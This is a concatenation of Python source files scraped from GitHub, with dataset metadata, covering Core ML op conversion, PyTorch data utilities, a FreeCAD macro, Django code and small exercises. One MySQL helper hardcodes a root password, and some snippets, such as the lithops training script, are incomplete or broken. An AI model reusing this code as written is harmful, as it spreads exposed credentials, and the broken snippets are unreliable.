mb.concat(values=[center_x, center_y, width, height], axis=-1)\n\n # Expand dims to construct the batch dim and score class dim expected by MIL NMS op.\n boxes = mb.expand_dims(x=boxes, axes=[0])\n scores = mb.expand_dims(x=scores, axes=[0, -1])\n\n if not is_current_opset_version_compatible_with(target.iOS17):\n _, _, indices, valid_outputs = mb.non_maximum_suppression(\n boxes=boxes,\n scores=scores,\n max_boxes=box_num,\n iou_threshold=iou_threshold,\n score_threshold=score_threshold,\n )\n\n indices = mb.squeeze(x=indices, axes=[0])\n valid_outputs = mb.squeeze(x=valid_outputs, axes=[0])\n range = mb.range_1d(end=valid_outputs, start=0, step=1)\n indices = mb.cast(x=indices, dtype=\"fp32\")\n valid_indices = mb.gather(x=indices, indices=range, axis=0)\n valid_indices = mb.cast(x=valid_indices, dtype=\"int32\", name=node.name)\n context.add(valid_indices)\n else:\n # In IOS17, the MIL NMS op's inputs are ordered with number of boxes in the last dimension.\n boxes = mb.transpose(x=boxes, perm=[0, 2, 1])\n scores = mb.transpose(x=scores, perm=[0, 2, 1])\n\n # In IOS17, the MIL NMS op's last output (number of valid boxes in each batch) gets removed.\n _, _, indices = mb.non_maximum_suppression(\n boxes=boxes,\n scores=scores,\n max_boxes=box_num,\n iou_threshold=iou_threshold,\n )\n\n # Remove invalid indices (the padded -1 indices).\n valid_outputs = mb.reduce_sum(\n x=mb.cast(x=mb.greater(x=indices, y=-1), dtype=\"int32\"), axes=[-1]\n )\n valid_indices = mb.slice_by_size(\n x=mb.squeeze(x=indices, axes=[0]),\n begin=mb.fill_like(ref_tensor=valid_outputs, value=0),\n size=valid_outputs,\n name=node.name,\n )\n context.add(valid_indices)\n\n\n@register_torch_op\ndef tupleindex(context, node):\n tuple_input, index_input = _get_inputs(context, node, expected=2)\n context.add(tuple_input[index_input.val], node.name)\n\n\ndef _get_causal_attn_mask(is_causal: bool, query_var: Var, key_var: Var) -> Var:\n assert is_causal\n\n # create mask of shape (target_seq, source_seq)\n # s.t the diagonal and lower triangular of the matrix is all 1s\n # and upper triangular is a large negative number (e.g. -30k)\n target_seq = query_var.shape[-2]\n source_seq = key_var.shape[-2]\n if is_symbolic(target_seq) or is_symbolic(source_seq):\n raise NotImplementedError(\n \"scaled_dot_product_attention op: \"\n \"is_causal flag not handled when sequence length is symbolic\"\n )\n\n all_ones = mb.fill(value=1.0, shape=(target_seq, source_seq))\n all_negative_inf = mb.fill(value=-3e4, shape=(target_seq, source_seq))\n all_ones_lower = mb.band_part(\n x=all_ones, lower=-1, upper=0\n ) # will 0 out upper triangle, excluding diag\n all_negative_inf_upper = mb.band_part(\n x=all_negative_inf, lower=0, upper=-1\n ) # will 0 out lower triangle, excluding diag\n all_negative_inf_diag_only = mb.band_part(x=all_negative_inf_upper, lower=0, upper=0)\n all_negative_inf_upper_no_diag = mb.sub(x=all_negative_inf_upper, y=all_negative_inf_diag_only)\n return mb.add(x=all_ones_lower, y=all_negative_inf_upper_no_diag)\n\n\ndef _cast_bool_attn_mask(attn_mask: Var, query_var: Var) -> Var:\n \"\"\"\n compute float mask as:\n mask = cast(bool_mask) + (1-cast(bool_mask)) * -30k*ones(shape(bool_mask))\n \"\"\"\n assert is_bool(attn_mask.dtype)\n\n shape = mb.shape(x=attn_mask)\n negative_inf = mb.fill(\n shape=shape, value=_np.array([-3e4]).astype(types.nptype_from_builtin(query_var.dtype))\n )\n mask = mb.cast(x=attn_mask, dtype=types.builtin_to_string(query_var.dtype))\n compliment_of_mask = mb.sub(\n x=_np.array([1.0]).astype(types.nptype_from_builtin(mask.dtype)), y=mask\n )\n compliment_of_mask = mb.mul(x=negative_inf, y=compliment_of_mask)\n return mb.add(x=mask, y=compliment_of_mask)\n\n\ndef _lower_scaled_dot_product_attention(q: Var, k: Var, v: Var, mask: Var, name: str) -> Var:\n # scale the query input\n embed_size = q.shape[-1]\n if is_symbolic(embed_size):\n raise ValueError(\n \"The embedding size, i.e. last dimension of the shape of query tensor\"\n \" cannot be symbolic, in scaled_dot_product_attention op\"\n )\n multiplicative_scale_factor = 1 / _math.sqrt(embed_size)\n q = mb.mul(x=q, y=multiplicative_scale_factor)\n\n # multiply query and key input tensors\n # shape of output: (target_seq, source_seq) or (B,...,target_seq, source_seq)\n attn_weights = mb.matmul(x=q, y=k, transpose_y=True)\n\n # add mask if applicable\n if mask is not None:\n attn_weights = mb.add(x=attn_weights, y=mask)\n\n # do softmax\n attn_weights_normalized = mb.softmax(x=attn_weights, axis=-1)\n\n # multiply attn_weights and value tensor\n res = mb.matmul(x=attn_weights_normalized, y=v, name=name)\n return res\n\n@register_torch_op\ndef scaled_dot_product_attention(context, node):\n \"\"\"\n Input shapes/types:\n - query : (target_seq, d) or (B, target_seq, d) or (B, h, target_seq, d) or (B,.., target_seq, d)\n - key : (source_seq, d) or (B, source_seq, d) or (B, h, source_seq, d) or (B,.., source_seq, d)\n - value: (source_seq, d_v) or (B, source_seq, d_v) or (B, h, source_seq, d_v) or (B,.., source_seq, d_v)\n - attn_mask : (target_seq, source_seq) or (B, target_seq, source_seq) or (B, h, target_seq, source_seq) or\n (B, ..., target_seq, source_seq)\n - is_causal : bool\n - scale : optional float\n\n Output shape: (target_seq, d_v) or (B,...,target_seq, d_v)\n\n output = softmax(scale*Q*K^transpose + mask) * V\n\n Currently, Core ML does not support dropout, so it has to be either None or 0\n\n See details at:\n https://pytorch.org/docs/stable/generated/torch.nn.functional.scaled_dot_product_attention.html\n \"\"\"\n inputs = _get_inputs(context, node, min_expected=3)\n q, k, v = inputs[:3]\n attn_mask = None if len(inputs) < 4 else inputs[3]\n dropout = 0.0 if len(inputs) < 5 else inputs[4]\n is_causal = False if len(inputs) < 6 else inputs[5].val\n \n # When len(inputs) == 7, the inputs are (q, k, v, attn_mask, dropout, is_causal, scale)\n if len(inputs) == 7 and inputs[6] is not None:\n raise NotImplementedError(\n \"scaled_dot_product_attention op: scale parameter is not handled.\"\n )\n \n if attn_mask is not None and is_causal:\n raise ValueError(\n \"scaled_dot_product_attention op: attn_mask cannot be provided when is_causal is set to True.\"\n )\n\n if dropout is not None and (dropout.val is None or dropout.val != 0.0):\n raise ValueError(\"scaled_dot_product_attention op: dropout is not supported yet\")\n\n # check that ranks of q, k, v and attn_mask match\n if k.rank != q.rank:\n raise ValueError(\n \"Rank of query and key do not match in scaled_dot_product_attention torch op\"\n )\n if v.rank != q.rank:\n raise ValueError(\n \"Rank of query and value do not match in scaled_dot_product_attention torch op\"\n )\n\n mask = None\n if is_causal:\n mask = _get_causal_attn_mask(is_causal, q, k)\n elif attn_mask is not None:\n if is_bool(attn_mask.dtype):\n mask = _cast_bool_attn_mask(attn_mask, q)\n else:\n mask = attn_mask\n\n res = _lower_scaled_dot_product_attention(q, k, v, mask, node.name)\n context.add(res)\n\n\n@register_torch_op\ndef fliplr(context, node):\n \"\"\"\n Flip tensor in the left/right direction.\n\n Flip the entries in each row in the left/right direction. Columns are preserved, but appear in a\n different order than before.\n It's equivalent to TF's reverse op but with axes always be [1].\n \"\"\"\n x = _get_inputs(context, node, expected=1)[0]\n res = mb.reverse(x=x, axes=[1], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef multinomial(context, node):\n x = context[node.inputs[0]]\n num_samples = context[node.inputs[1]].val\n replacement = context[node.inputs[2]].val\n if num_samples is None:\n raise ValueError(\"In torch.multinomial op, num_samples must be const\")\n if num_samples > 1 and not replacement:\n raise ValueError(\"When num_samples is larger than 1, only replacement=True is supported.\")\n x = mb.random_categorical(x=x, size=num_samples, name=node.name)\n context.add(x)\n","repo_name":"apple/coremltools","sub_path":"coremltools/converters/mil/frontend/torch/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":223119,"program_lang":"python","lang":"en","doc_type":"code","stars":3733,"dataset":"github-code","pt":"47"} +{"seq_id":"70769519182","text":"import numpy as np\nimport torch.utils.data as data\nimport torchvision.datasets as datasets\n\nfrom collections import defaultdict\n\n\nclass LabelNoise(data.Dataset):\n def __init__(self, dataset, k, n_labels, p=1):\n\n assert n_labels % k == 0\n\n self.dataset = dataset\n self.k = k\n # random label between 0 and k-1\n self.noise = np.random.choice(k, size=len(self.dataset))\n # noisy labels are introduced for each sample with probability p\n self.p = np.random.binomial(1, p, size=len(self.dataset))\n\n print('Noisy labels (p={})'.format(p))\n\n def __getitem__(self, idx):\n img, label = self.dataset[idx]\n if self.p[idx]:\n label = label - label % self.k + self.noise[idx]\n return img, label\n\n def __len__(self):\n return len(self.dataset)\n\n\nclass Subset(data.Dataset):\n def __init__(self, dataset, indices=None):\n \"\"\"\n Subset of dataset given by indices.\n \"\"\"\n super(Subset, self).__init__()\n self.dataset = dataset\n self.indices = indices\n\n if self.indices is None:\n self.n_samples = len(self.dataset)\n else:\n self.n_samples = len(self.indices)\n assert self.n_samples >= 0 and \\\n self.n_samples <= len(self.dataset), \\\n \"length of {} incompatible with dataset of size {}\"\\\n .format(self.n_samples, len(self.dataset))\n\n def __getitem__(self, idx):\n if self.indices is None:\n return self.dataset[idx]\n else:\n return self.dataset[self.indices[idx]]\n\n def __len__(self):\n return self.n_samples\n\n\ndef random_subsets(subset_sizes, n_total, seed=None, replace=False):\n \"\"\"\n Return subsets of indices, with sizes given by the iterable\n subset_sizes, drawn from {0, ..., n_total - 1}\n Subsets may be distinct or not according to the replace option.\n Optional seed for deterministic draw.\n \"\"\"\n # save current random state\n state = np.random.get_state()\n sum_sizes = sum(subset_sizes)\n assert sum_sizes <= n_total\n\n np.random.seed(seed)\n\n total_subset = np.random.choice(n_total, size=sum_sizes,\n replace=replace)\n perm = np.random.permutation(total_subset)\n res = []\n start = 0\n for size in subset_sizes:\n res.append(perm[start: start + size])\n start += size\n # restore initial random state\n np.random.set_state(state)\n return res\n\n\ndef split_dataset(dataset_train, dataset_val, train_size, val_size):\n if isinstance(dataset_train, datasets.ImageFolder):\n n_classes = len(dataset_train.classes)\n if train_size < len(dataset_train):\n train_size_per_class = train_size // n_classes\n else:\n train_size_per_class = float('inf')\n assert train_size_per_class > 0\n my_dict = defaultdict(list)\n [my_dict[e[1]].append(e[0]) for e in dataset_train.imgs]\n train_imgs = []\n for k in my_dict.keys():\n imgs = my_dict[k]\n adapted_train_size = min(train_size_per_class, len(imgs))\n train_indices, = random_subsets((adapted_train_size,),\n len(imgs),\n seed=1234 + int(k))\n train_imgs += [(imgs[idx], int(k)) for idx in train_indices]\n np.random.shuffle(train_imgs)\n dataset_train.imgs = train_imgs\n else:\n train_indices, val_indices = random_subsets((train_size, val_size),\n len(dataset_train),\n seed=1234)\n\n dataset_train = Subset(dataset_train, train_indices)\n dataset_val = Subset(dataset_val, val_indices)\n\n return dataset_train, dataset_val\n","repo_name":"oval-group/smooth-topk","sub_path":"experiments/data/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":242,"dataset":"github-code","pt":"47"} +{"seq_id":"21103182895","text":"from utils import AoCDay\nfrom functools import cache\n\n\nclass Day10(AoCDay):\n grid: list[list[bool]]\n\n def load(self):\n self.grid = [[c == \"#\" for c in line] for line in self.lines]\n\n def raycast_and_count(self, r: int, c: int):\n targets = [a for a in self.get_all_asteroids() if a is not (r, c)]\n lines = [\n lambda x: ((r - t[0])/(c - t[1]))*(x-t[1])\n for t in targets\n ]\n return lines\n\n @cache\n def get_all_asteroids(self) -> set[tuple[int, int]]:\n asteroids = set()\n for r in range(len(self.grid)):\n for c in range(len(self.grid[0])):\n if self.grid[r][c]:\n asteroids.add((r, c))\n return asteroids\n\n\n def part1(self):\n self.load()\n\n print(self.get_all_asteroids())\n print([f(4) for f in self.raycast_and_count(4, 4)])\n","repo_name":"ninjawarrior1337/AoC","sub_path":"2019/days/Day10.py","file_name":"Day10.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19940145327","text":"# -*- coding: utf-8 -*-\n\n# compatible to Python 3\n\nimport os\nimport FreeCAD as app\nimport FreeCADGui as gui\nfrom FreeCAD import Vector, Rotation\nimport Part\nimport math\n\n\niconPath = os.path.dirname(__file__)\n\nepsilon = 1e-7 \n \nclass LasercutterTechdrawExportItem:\n def __init__(self, \n fp, # an instance of Part::FeaturePython\n Part = None,\n BeamWidth = 0.2,\n Normal = Vector(0, 0, 0),\n method = 'auto'):\n self.updating = False\n fp.addProperty('App::PropertyLink', 'Part', 'LasercutterTechdrawExport', 'Selected part').Part = Part\n fp.addProperty('App::PropertyVector', 'Normal', 'LasercutterTechdrawExport', 'vertical vector. (0, 0, 0) = rotate the part that it fits best').Normal = Normal\n fp.addProperty('App::PropertyFloat', 'BeamWidth', 'LasercutterTechdrawExport', 'Laser beam width in mm').BeamWidth = BeamWidth\n fp.addProperty('App::PropertyEnumeration', 'Method', 'LasercutterTechdrawExport', 'How to create the outline').Method = ['auto', '2D', '3D', 'face', 'normal']\n fp.Method = method\n fp.Proxy = self\n \n def execute(self, fp):\n '''Do something when doing a recomputation, this method is mandatory'''\n if fp.Part and fp.Normal and (not self.updating):\n self.make_outline(fp)\n \n def onChanged(self, fp, prop):\n '''Do something when a property has changed'''\n props = ['Part', 'BeamWidth', 'Normal', 'Method']\n if prop in props:\n self.execute(fp) \n \n def make_outline(self, fp): \n self.updating = True \n \n if fp.Method == 'normal': \n outline = fp.Part.Shape.makeOffsetShape(fp.BeamWidth / 2, 1e-7)\n elif fp.Method == '2D':\n outline = fp.Part.Shape.makeOffset2D(fp.BeamWidth / 2) \n fp.Normal = self.getNormal(fp.Part) \n elif fp.Method == '3D':\n outline = fp.Part.Shape.makeOffsetShape(fp.BeamWidth / 2, 1e-7)\n fp.Normal = self.getNormal(fp.Part) \n else:\n face = self.get_biggest_face(fp.Part)\n if face:\n outline = face.makeOffset2D(fp.BeamWidth / 2)\n fp.Normal = face.normalAt(0, 0)\n elif fp.Method == 'auto':\n try:\n outline = fp.Part.Shape.makeOffset2D(fp.BeamWidth / 2) \n except Exception as ex:\n outline = fp.Part.Shape.makeOffsetShape(fp.BeamWidth / 2, 1e-7) \n \n fp.Normal = self.getNormal(fp.Part) \n \n fp.Shape = Part.Compound(outline.Wires);\n fp.Label = fp.Part.Label + ' offset'\n fp.Placement = outline.Placement\n \n if fp.Placement.Rotation.Axis.z < 0:\n fp.Placement.Rotation.Axis = fp.Placement.Rotation.Axis * -1\n \n if fp.Method != 'normal': \n if fp.Normal.z < 0:\n fp.Normal = fp.Normal * -1\n \n rotation_to_apply = Rotation(fp.Normal, Vector(0, 0, 1)) \n new_rotation = rotation_to_apply.multiply(fp.Placement.Rotation)\n fp.Placement.Rotation = new_rotation\n \n self.rotate_biggest_side_up(fp)\n \n self.updating = False\n \n def get_biggest_face(self, part):\n max_area = 0\n max_face = None\n for face in part.Shape.Faces:\n if face and face.Area > max_area:\n max_area = face.Area\n max_face = face\n \n if max_face:\n return max_face\n \n def rotate_biggest_side_up(self, fp):\n bbox = fp.Shape.optimalBoundingBox()\n xmin = bbox.XLength\n angle = 0.0\n r = fp.Placement.Rotation\n r_best = r\n step = 180 / 16\n while angle + step < 180: \n angle = angle + step \n rotation_to_apply = Rotation()\n rotation_to_apply.Axis = Vector(0, 0, 1) \n rotation_to_apply.Angle = math.radians(angle) \n fp.Placement.Rotation = rotation_to_apply.multiply(r)\n bbox = fp.Shape.optimalBoundingBox()\n \n if xmin > bbox.XLength:\n xmin = bbox.XLength\n r_best = fp.Placement.Rotation\n \n fp.Placement.Rotation = r_best\n \n def getNormal(self, obj):\n if hasattr(obj, 'Dir'):\n return obj.Dir\n else:\n bbox = obj.Shape.BoundBox\n if bbox.XLength < epsilon: return Vector(1.0,0.0,0.0)\n elif bbox.YLength < epsilon: return Vector(0.0,1.0,0.0)\n elif bbox.ZLength < epsilon: return Vector(0.0,0.0,1.0)\n return obj.Placement.Rotation.multVec(Vector(0, 0, 1))\n\n\nclass LasercutterTechdrawExportItemViewProvider:\n def __init__(self, vobj):\n '''Set this object to the proxy object of the actual view provider'''\n vobj.Proxy = self\n self.Object = vobj.Object\n \n def getIcon(self):\n '''Return the icon which will FreeCADear in the tree view. This method is optional and if not defined a default icon is shown.'''\n return (os.path.join(iconPath, 'LasercutterTechdrawExport.svg'))\n\n def attach(self, vobj):\n '''Setup the scene sub-graph of the view provider, this method is mandatory'''\n self.Object = vobj.Object\n self.onChanged(vobj, 'Base')\n \n def updateData(self, fp, prop):\n '''If a property of the handled feature has changed we have the chance to handle this here'''\n pass\n \n def claimChildren(self):\n '''Return a list of objects that will be modified by this feature'''\n pass\n \n def onDelete(self, feature, subelements):\n '''Here we can do something when the feature will be deleted'''\n return True\n \n def onChanged(self, fp, prop):\n '''Here we can do something when a single property got changed'''\n pass\n \n def setEdit(self, vobj=None, mode=0):\n return False\n \n def __getstate__(self):\n '''When saving the document this object gets stored using Python's json module.\\\n Since we have some un-serializable parts here -- the Coin stuff -- we must define this method\\\n to return a tuple of all serializable objects or None.'''\n return None\n \n def __setstate__(self,state):\n '''When restoring the serialized object from document we have the chance to set some internals here.\\\n Since no data were serialized nothing needs to be done here.'''\n return None\n \n\n\ndef selected_to_techdraw(doc, offsets, techdraw, BeamWidth):\n x = BeamWidth\n y = 0\n \n for offset in offsets:\n viewname = offset.Label.replace('offset', 'contour')\n views = doc.getObjectsByLabel(viewname)\n if len(views) > 0:\n view = views[0]\n else:\n view = doc.addObject('TechDraw::DrawViewPart', viewname)\n techdraw.addView(view)\n \n try:\n view.CoarseView = False\n view.ViewObject.LineWidth = BeamWidth\n view.Source = offset\n view.Direction = Vector(0, 0, 1)\n view.ScaleType = u'Custom'\n view.Scale = 1.00\n except Exception as ex:\n app.Console.PrintError('\\nview for ' + viewname + ' cannot be created ! ')\n app.Console.PrintError(ex)\n \n for view in techdraw.Views:\n offset = view.Source[0]\n bbox = offset.Shape.BoundBox\n bsize = Vector(bbox.XLength, bbox.YLength, bbox.ZLength)\n \n # add a 2D view to the TechDraw page right of the last part\n maxheight = y + bsize.y + BeamWidth\n if maxheight > techdraw.Template.Height:\n techdraw.Template.Height = maxheight\n\n maxwidth = x + bsize.x + BeamWidth\n if maxwidth > techdraw.Template.Width:\n techdraw.Template.Width = maxwidth\n \n view.X = x + bsize.x / 2\n view.Y = y + bsize.y - (bsize.y / 2)\n x = x + bsize.x + BeamWidth\n\ndef makeLasercutterTechdrawExport(parts, BeamWidth = 0.2, doc = app.activeDocument(), method = 'auto', normal = Vector(0, 0, 0)):\n if len(parts) == 0: return\n \n techdraw = doc.addObject('TechDraw::DrawPage','LasercutterTechdraw')\n template = doc.addObject('TechDraw::DrawSVGTemplate','Template')\n techdraw.Template = template\n doc.recompute()\n \n for p in parts:\n if len(p.Shape.Solids) > 1:\n for sol in p.Shape.Solids:\n sfp = doc.addObject('Part::Feature', p.Label) \n sfp.Shape = Part.Shape(sol)\n sfp.ViewObject.hide()\n addToExportObjects(doc, sfp)\n addLasercutterTechdrawItem(techdraw, sfp, BeamWidth, doc, method, normal)\n \n else:\n addLasercutterTechdrawItem(techdraw, p, BeamWidth, doc, method, normal)\n \n doc.recompute() \n techdraw.ViewObject.show() \n return techdraw\n \n \ndef addLasercutterTechdrawItem(techdraw, part, BeamWidth = 0.2, doc = app.activeDocument(), method = 'auto', normal = Vector(0, 0, 0)): \n ifp = doc.addObject('Part::FeaturePython', 'LasercutterTechdrawExport')\n LasercutterTechdrawExportItem(ifp, part, BeamWidth, method=method, Normal=normal)\n LasercutterTechdrawExportItemViewProvider(ifp.ViewObject)\n doc.recompute()\n selected_to_techdraw(doc, [ifp], techdraw, BeamWidth)\n addToExportObjects(doc, ifp)\n return ifp\n \ndef addToExportObjects(doc, ifp):\n LaserCutterExportObjects = doc.getObjectsByLabel('LaserCutterExportObjects')\n if len(LaserCutterExportObjects) == 0:\n LaserCutterExportObjects = doc.addObject('App::DocumentObjectGroup', 'LaserCutterExportObjects')\n else:\n LaserCutterExportObjects = LaserCutterExportObjects[0]\n \n LaserCutterExportObjects.Group = LaserCutterExportObjects.Group + [ifp]\n LaserCutterExportObjects.ViewObject.hide()\n","repo_name":"FreeCAD/FreeCAD-macros","sub_path":"TechDraw/LasercutterSVGExport/LasercutterTechdrawExport.py","file_name":"LasercutterTechdrawExport.py","file_ext":"py","file_size_in_byte":10110,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"47"} +{"seq_id":"39779097005","text":"import class_person\nimport termtables as tt\n\nimport os\n\ndef clear_screen():\n print (\"\\n\" * 100)\n\n\ndef b_day_reedable(year, month, day):\n months={\n 1:\"Jan\",\n 2:\"Feb\",\n 3:\"Mar\",\n 4:\"Apr\",\n 5:\"May\",\n 6:\"Jun\",\n 7:\"Jul\",\n 8:\"Aug\",\n 9:\"Sep\",\n 10:\"Oct\",\n 11:\"Nov\",\n 12:\"Dec\"\n }\n return day, months[int(month)], year\n\n\n\ndef disp(Data_base):\n clear_screen()\n table=[]\n for person in Data_base:\n p_table=[]\n p_table.append(person.num_id)\n p_table.append(person.first_name)\n p_table.append(person.surname)\n date=b_day_reedable(person.birth_year, person.birth_month, person.birth_day)\n p_table.append(date[0] +\" \"+ date[1] +\" \"+ date[2])\n p_table.append(person.position)\n p_table.append(person.pesel)\n table.append(p_table)\n\n\n string = tt.to_string(\n [table],\n header=[\"ID\", \"First name\", \"Surname\", \"Date of birth\" , \"Position\", \"Pesel\"],\n style=tt.styles.ascii_thin_double,\n # alignment=\"ll\",\n # padding=(0, 1),\n )\n print(string)\n\n input(\"Press Enter to continue...\")\n\n\n","repo_name":"mvtthxw/workers_database","sub_path":"display_db.py","file_name":"display_db.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3878997379","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\ndef inverse_series(s):\n indices = s.index\n values = s.values\n\n return pd.Series(indices, index = values)\n\ndef main():\n test_series = pd.Series([1, 2,3, 1], index = ['w', 'x','y','z'])\n print(test_series)\n print(inverse_series(test_series))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"immortalRegis/MOOC-Helsinki-Data-Analysis-with-Python","sub_path":"part03-e15_inverse_series/src/inverse_series.py","file_name":"inverse_series.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30125582848","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('typecars', '0002_auto_20150721_1022'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='models',\n options={'ordering': ['-id'], 'verbose_name': 'Model', 'verbose_name_plural': 'Models'},\n ),\n migrations.AlterField(\n model_name='models',\n name='brand',\n field=models.ForeignKey(related_name='brand_models', to='typecars.Brands'),\n ),\n migrations.AlterField(\n model_name='models',\n name='service_frequency_mileage',\n field=models.IntegerField(),\n ),\n ]\n","repo_name":"burmystrov/wapp","sub_path":"typecars/migrations/0003_auto_20150723_1205.py","file_name":"0003_auto_20150723_1205.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21452710803","text":"__author__ = 'LY'\n__date__ = '2019/9/18 17:06'\nfrom django.core.files.storage import Storage\nfrom django.conf import settings\nfrom fdfs_client.client import *\n\n\nclass FDFSStorage(Storage):\n def __init__(self, client_conf=None, base_url=None):\n \"\"\"初始化\"\"\"\n if client_conf is None:\n client_conf = settings.FDFS_CLIENT_CONF\n self.client_conf = client_conf\n\n if base_url is None:\n base_url = settings.FDFS_URL\n self.base_url = base_url\n\n def _open(self, name, mode='rb'):\n # 打开文件时使用\n pass\n def _save(self, name, content):\n client=Fdfs_client('./utils/fdfs/client.conf')\n\n # trackers = get_tracker_conf('./utils/fdfs/client.conf')\n # client = Fdfs_client(trackers)\n\n\n res = client.upload_by_buffer(content.read())\n if res.get('Status') != 'Upload successed.':\n raise Exception('上传文件到FastDFS失败')\n\n filename = res.get('Remote file_id')\n\n return filename\n\n def exists(self, name):\n \"\"\"Django判断文件名是否可用\"\"\"\n return False\n\n def url(self, name):\n \"\"\"返回访问文件url路径\"\"\"\n return self.base_url + name","repo_name":"LuckyRyan-web/dailyfresh-xadmin","sub_path":"utils/fdfs/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"47"} +{"seq_id":"13818254018","text":"def solution(people, limit):\n answer = 0\n start, end = 0, len(people)-1\n people.sort()\n \n while people[end] >= limit:\n end-=1\n answer+=1\n \n while end >= start:\n tmp = people[end]\n end-=1\n while tmp + people[start] <= limit:\n tmp+=people[start]\n start+=1\n if start > end: break\n answer+=1\n \n return answer\n","repo_name":"leejuye/coding-test","sub_path":"programmers/python/구명보트.py","file_name":"구명보트.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"72837592784","text":"import pandas as pd\r\nfrom pandas.io import sql\r\nimport mysql.connector\r\nfrom sqlalchemy import create_engine\r\n\r\nconfig = {\r\n \"host\": \"localhost\",\r\n \"user\": \"root\",\r\n \"password\": \"82276300\",\r\n}\r\nclass my_SQL:\r\n def __init__(self, st):\r\n self.st = st\r\n self.db = mysql.connector.connect(**config)\r\n self.cursor = self.db.cursor()\r\n self.cursor.execute(\"create database IF NOT EXISTS Power_Prediction\")\r\n config['database'] = \"Power_Prediction\"\r\n\r\n self.con = mysql.connector.connect(**config)\r\n self.cursor = self.con.cursor()\r\n\r\n def check_table(self):\r\n stmt = \"SHOW TABLES LIKE 'Historical_Power_Data'\"\r\n self.cursor.execute(stmt)\r\n result = self.cursor.fetchone()\r\n if result:\r\n return True\r\n else:\r\n return False\r\n\r\n def creat_historical_tabel(self, file_path):\r\n try:\r\n engine = create_engine(\"mysql+pymysql://{user}:{pw}@{host}/{db}\"\r\n .format(host=\"localhost\", db=\"Power_Prediction\", user=\"root\", pw=\"82276300\"))\r\n\r\n con = engine.connect()\r\n\r\n df = pd.read_csv(file_path)\r\n\r\n df.to_sql(con=con, name='Historical_Power_Data',\r\n if_exists='replace', index=False)\r\n\r\n return None\r\n\r\n except (mysql.connector.Error, ValueError) as err:\r\n\r\n return err\r\n\r\n","repo_name":"rohollahyousefpour/powerprediction","sub_path":"database_Manage.py","file_name":"database_Manage.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29149527038","text":"import torch\nimport os\nfrom glob2 import glob\nfrom torchvision import datasets, transforms\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\nfrom torch.distributed.optim import DistributedOptimizer\nimport torch.distributed.autograd as dist_autograd\n\nimport lithopsext\nimport lithops\n\nlithops.utils.setup_lithops_logger(log_level='DEBUG')\n\n# def upload_data():\n# storage = lithops.storage.Storage()\n# for obj in glob(os.path.expanduser('~/Downloads/mnist_png/*/*/*')):\n# # print(obj)\n# with open(obj, 'rb') as file:\n# data = file.read()\n# key = obj.split('mnist_png/', 1)[1]\n# storage.put_object(bucket='aitor-data', key='mnist_png/{}'.format(key), body=data)\n#\n# upload_data()\n\ntrain_dataset = lithopsext.datasets.ObjectBag.s3_glob('s3://aitor-data/mnist_png/training/*',\n batch_size=1000,\n lazy_loading=True)\nprint(train_dataset)\n\n\ndef get_accuracy(test_loader, model):\n model.eval()\n correct_sum = 0\n with torch.no_grad():\n for i, (data, target) in enumerate(test_loader):\n out = model(data, -1)\n pred = out.argmax(dim=1, keepdim=True)\n pred, target = pred, target\n correct = pred.eq(target.view_as(pred)).sum().item()\n correct_sum += correct\n\n print(f\"Accuracy {correct_sum / len(test_loader.dataset)}\")\n\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\n self.dropout1 = nn.Dropout2d(0.25)\n self.dropout2 = nn.Dropout2d(0.5)\n self.fc1 = nn.Linear(9216, 128)\n self.fc2 = nn.Linear(128, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = F.max_pool2d(x, 2)\n\n x = self.dropout1(x)\n x = torch.flatten(x, 1)\n # Move tensor to next device if necessary\n next_device = next(self.fc1.parameters()).device\n x = x.to(next_device)\n\n x = self.fc1(x)\n x = F.relu(x)\n x = self.dropout2(x)\n x = self.fc2(x)\n output = F.log_softmax(x, dim=1)\n return output\n\n\ndef training_loop(training_data_chunk, iterations, test_loader):\n net = Net()\n\n for _ in range(iterations):\n data, target = next(training_data_chunk)\n net.zero_grad()\n output = net(training_data_chunk)\n loss = F.nll_loss(output, target)\n loss.backward()\n return self.model.get_gradients()\n\n\nrun_training_loop(train_data, test_data)\n","repo_name":"aitorarjona/dd-lithops","sub_path":"parameter_server_lithops.py","file_name":"parameter_server_lithops.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35810825150","text":"import numpy as np\nfrom scipy.linalg import cho_factor, cho_solve\nfrom statsmodels.tools.validation import array_like, PandasWrapper\n\ndef hprescott(X, side=2, smooth=1600, freq=''):\n '''\n Hodrick-Prescott filter with the option to use either the standard two-sided \n or one-sided implementation. The two-sided implementation leads to equivalent\n results as when using the statsmodel.tsa hpfilter function\n \n Parameters\n ----------\n X : array-like\n The time series to 